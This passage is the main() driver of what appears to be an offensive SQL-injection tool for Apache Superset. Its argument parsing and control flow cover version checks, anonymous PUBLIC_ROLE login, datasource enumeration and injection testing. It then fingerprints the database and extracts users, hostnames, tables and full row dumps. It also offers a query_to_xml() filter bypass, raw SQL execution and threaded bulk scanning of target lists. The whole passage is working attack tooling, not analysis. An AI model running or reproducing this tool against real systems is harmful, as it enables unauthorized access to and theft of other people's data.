    g.add_argument("--current-db", action="store_true", help="current database")
    g.add_argument("--hostname", action="store_true", help="server hostname")
    g.add_argument("--dbs", action="store_true", help="list databases")
    g.add_argument("--tables", action="store_true", help="list tables")
    g.add_argument("--columns", action="store_true", help="list columns (requires -T)")
    g.add_argument("--dump", action="store_true", help="dump table (requires -T)")
    g.add_argument("--dump-all", action="store_true", help="dump all tables")
    g.add_argument("--count", action="store_true", help="count table rows (requires -T)")

    g = P.add_argument_group(f"{C.RED}SPECIFY{C.RESET}",
                             f"{C.DIM}narrow down the target{C.RESET}")
    g.add_argument("-D", dest="target_db", help="target database/schema")
    g.add_argument("-T", dest="target_table", help="target table")
    g.add_argument("-C", dest="target_columns", help="target columns (comma-sep)")
    g.add_argument("--start", type=int, default=0, help="start row (default: 0)")
    g.add_argument("--stop", type=int, default=20, help="stop row (default: 20)")

    g = P.add_argument_group(f"{C.RED}INJECTION{C.RESET}",
                             f"{C.DIM}manual control over the injection{C.RESET}")
    g.add_argument("--check", action="store_true", help="recon only")
    g.add_argument("--test", action="store_true", help="test if injectable")
    g.add_argument("--sql", help="raw SQL query to extract")
    g.add_argument("--injection-point", choices=["sqlExpression", "where"],
                   default="sqlExpression", help="injection vector (default: sqlExpression)")
    g.add_argument("--xml-bypass", action="store_true",
                   help="bypass subquery filter via query_to_xml()")

    g = P.add_argument_group(f"{C.RED}SCAN{C.RESET}")
    g.add_argument("--scan-file", help="bulk scan targets (one URL/line)")
    g.add_argument("--threads", type=int, default=10, help="scan threads (default: 10)")
    g.add_argument("--scan-output", help="save scan results")

    g = P.add_argument_group(f"{C.RED}GENERAL{C.RESET}")
    g.add_argument("-v", type=int, default=1, help="verbosity 0-3 (default: 1)")
    g.add_argument("--proxy", help="HTTP proxy (http://127.0.0.1:8080)")
    g.add_argument("--timeout", type=int, default=30, help="timeout (default: 30)")
    g.add_argument("--batch", action="store_true", help="non-interactive mode")

    args = P.parse_args()
    VERBOSITY = args.v

    # Bulk scan
    if args.scan_file:
        run_bulk_scan(args.scan_file, args.threads, args.timeout, args.scan_output)
        sys.exit(0)

    if not args.url:
        fail("--url / -u required (or --scan-file for bulk)")
        P.print_usage()
        sys.exit(1)

    base_url = args.url.rstrip("/")
    if args.proxy:
        import os
        os.environ["HTTP_PROXY"] = args.proxy
        os.environ["HTTPS_PROXY"] = args.proxy

    banner()

    # -- Recon ----------------------------------------------------------------
    info("probing target...")
    version = check_version(base_url, timeout=args.timeout)
    if version:
        if is_vulnerable(version):
            good(f"Superset {C.BOLD}{version}{C.RESET} -- {C.RED}{C.BOLD}VULNERABLE{C.RESET}")
        else:
            warn(f"Superset {version} -- likely patched")
    else:
        warn("version unknown")

    # -- Auth -----------------------------------------------------------------
    session = None

    if args.anonymous:
        info("trying anonymous access (PUBLIC_ROLE)...")
        session = try_anonymous(base_url, timeout=args.timeout)
        if session:
            good(f"anonymous access {C.BOLD}WORKS{C.RESET} -- PUBLIC_ROLE is active")
            creepy("no credentials needed. they left the door open.")
        else:
            fail("anonymous access denied -- PUBLIC_ROLE not configured")
            warn("falling back to credential-based login...")

    if not session:
        info(f"authenticating as '{args.user}'...")
        session = login(base_url, args.user, args.password, timeout=args.timeout)
        if not session:
            fail("all authentication methods failed")
            sys.exit(1)
        good("authenticated")

    # -- Datasources ----------------------------------------------------------
    info("enumerating datasources...")
    datasources = enumerate_datasources(base_url, session, timeout=args.timeout)
    if datasources:
        good(f"{len(datasources)} datasource(s):")
        for ds in datasources:
            print(f"    {C.CYAN}{ds['id']}{C.RESET}  {ds['name']}  "
                  f"{C.DIM}[{ds['database']}]{C.RESET}")
    else:
        warn("no datasources found")

    if args.check:
        print(f"\n  {C.GRAY}// recon complete.{C.RESET}\n")
        sys.exit(0)

    # -- Resolve datasource ---------------------------------------------------
    if not args.ds_id:
        if datasources:
            args.ds_id = datasources[0]["id"]
            info(f"using datasource: {C.BOLD}{args.ds_id}{C.RESET}")
        else:
            fail("no --ds-id and no datasources found")
            sys.exit(1)

    # -- Test injection -------------------------------------------------------
    has_enum = any([args.banner, args.current_user, args.current_db, args.hostname,
                    args.dbs, args.tables, args.columns, args.dump, args.dump_all,
                    args.count, args.sql, args.test])

    if has_enum or args.test:
        info(f"testing injection via {C.BOLD}{args.injection_point}{C.RESET}...")
        inj = test_injectable(base_url, session, args.ds_id, timeout=args.timeout)
        if inj:
            good(f"injectable via {C.BOLD}{inj}{C.RESET}")
            args.injection_point = inj
        else:
            fail("injection test failed")
            if args.test:
                sys.exit(1)

    if args.test and not any([args.banner, args.current_user, args.current_db,
                              args.dbs, args.tables, args.columns, args.dump,
                              args.dump_all, args.count, args.sql]):
        print(f"\n  {C.GRAY}// injectable. use --banner, --tables, --dump to extract.{C.RESET}\n")
        sys.exit(0)

    # -- Fingerprint DB -------------------------------------------------------
    db_type = "unknown"
    if has_enum and not args.sql:
        db_type = fingerprint_db(base_url, session, args.ds_id,
                                 args.injection_point, args.timeout)

    ip = args.injection_point
    xb = args.xml_bypass
    to = args.timeout

    # -- Enumeration ----------------------------------------------------------
    if args.banner:
        enum_banner(base_url, session, args.ds_id, db_type, ip, xb, to)

    if args.current_user:
        enum_current_user(base_url, session, args.ds_id, db_type, ip, xb, to)

    if args.current_db:
        enum_current_db(base_url, session, args.ds_id, db_type, ip, xb, to)

    if args.hostname:
        enum_hostname(base_url, session, args.ds_id, db_type, ip, xb, to)

    if args.dbs:
        enum_dbs(base_url, session, args.ds_id, db_type, ip, xb, to)

    if args.tables:
        enum_tables(base_url, session, args.ds_id, db_type, ip, xb, to,
                    target_db=args.target_db, datasources=datasources)

    if args.columns:
        if not args.target_table:
            fail("--columns requires -T <table>")
            sys.exit(1)
        enum_columns(base_url, session, args.ds_id, db_type, ip, xb, to,
                     args.target_table, target_db=args.target_db,
                     datasources=datasources)

    if args.count:
        if not args.target_table:
            fail("--count requires -T <table>")
            sys.exit(1)
        enum_count(base_url, session, args.ds_id, db_type, ip, xb, to,
                   args.target_table, target_db=args.target_db)

    if args.dump:
        if not args.target_table:
            fail("--dump requires -T <table>")
            sys.exit(1)
        enum_dump(base_url, session, args.ds_id, db_type, ip, xb, to,
                  args.target_table, target_columns=args.target_columns,
                  target_db=args.target_db,
                  start=args.start, stop=args.stop, datasources=datasources)

    if args.dump_all:
        enum_dump_all(base_url, session, args.ds_id, db_type, ip, xb, to,
                      target_db=args.target_db,
                      start=args.start, stop=args.stop, datasources=datasources)

    # -- Raw SQL --------------------------------------------------------------
    if args.sql:
        info(f"executing: {C.DIM}{args.sql}{C.RESET}")
        val = extract_value(base_url, session, args.ds_id, args.sql,
                            inj_point=ip, xml_bypass=xb, timeout=to)
        if val:
            good(f"result: {C.BOLD}{val}{C.RESET}")
        else:
            fail("no data extracted")

    print(f"\n  {C.GRAY}{C.DIM}// sqlExpression was never meant to be trusted.{C.RESET}\n")


if __name__ == "__main__":
    main()